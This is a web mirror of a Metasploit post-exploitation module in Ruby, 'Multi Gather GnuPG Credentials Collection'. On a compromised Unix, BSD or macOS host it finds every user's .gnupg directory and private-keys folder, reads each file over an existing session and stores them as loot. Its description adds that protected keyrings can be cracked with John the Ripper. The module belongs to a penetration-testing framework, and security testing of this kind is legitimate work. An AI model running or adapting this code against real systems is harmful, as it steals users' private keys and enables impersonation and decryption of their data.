Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/gpg_creds.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Unix

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Multi Gather GnuPG Credentials Collection',

15
        'Description' => %q{

16
          This module will collect the contents of all users' .gnupg directories on the targeted

17
          machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [

21
          'Dhiru Kholia <dhiru[at]openwall.com>', # Original author

22
          'Henry Hoggard' # Add GPG 2.1 keys, stop writing empty files

23
        ],

24
        'Platform' => %w[bsd linux osx unix],

25
        'SessionTypes' => ['shell', 'meterpreter'],

26
        'Notes' => {

27
          'Stability' => [CRASH_SAFE],

28
          'SideEffects' => [],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33
  end

34


35
  # This module is largely based on ssh_creds and firefox_creds.rb.

36


37
  def run

38
    paths = []

39
    print_status('Finding GnuPG directories')

40
    dirs = enum_user_directories

41
    sub_dirs = ['private-keys-v1.d']

42


43
    dirs.each do |dir|

44
      gnupg_dir = "#{dir}/.gnupg"

45
      next unless directory?(gnupg_dir)

46


47
      paths << gnupg_dir

48


49
      sub_dirs.each do |sub_dir|

50
        paths << "#{gnupg_dir}/#{sub_dir}" if directory?("#{gnupg_dir}/#{sub_dir}")

51
      end

52
    end

53


54
    if paths.nil? || paths.empty?

55
      print_error('No users found with a GnuPG directory')

56
      return

57
    end

58


59
    download_loot(paths)

60
  end

61


62
  def download_loot(paths)

63
    print_status("Looting #{paths.count} directories")

64
    paths.each do |path|

65
      path.chomp!

66
      sep = '/'

67
      files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)

68


69
      files.each do |file|

70
        target = "#{path}#{sep}#{file}"

71
        if directory?(target)

72
          next

73
        end

74


75
        print_status("Downloading #{target} -> #{file}")

76
        data = read_file(target)

77
        file = file.split(sep).last

78
        type = file.gsub(/\.gpg.*/, '').gsub(/gpg\./, '')

79
        if data.to_s.empty?

80
          vprint_error("No data found for #{file}")

81
        else

82
          loot_path = store_loot("gpg.#{type}", 'text/plain', session, data,

83
                                 "gpg_#{file}", "GnuPG #{file} File")

84
          print_good("File stored in: #{loot_path}")

85
        end

86
      end

87
    end

88
  end

89
end

90


91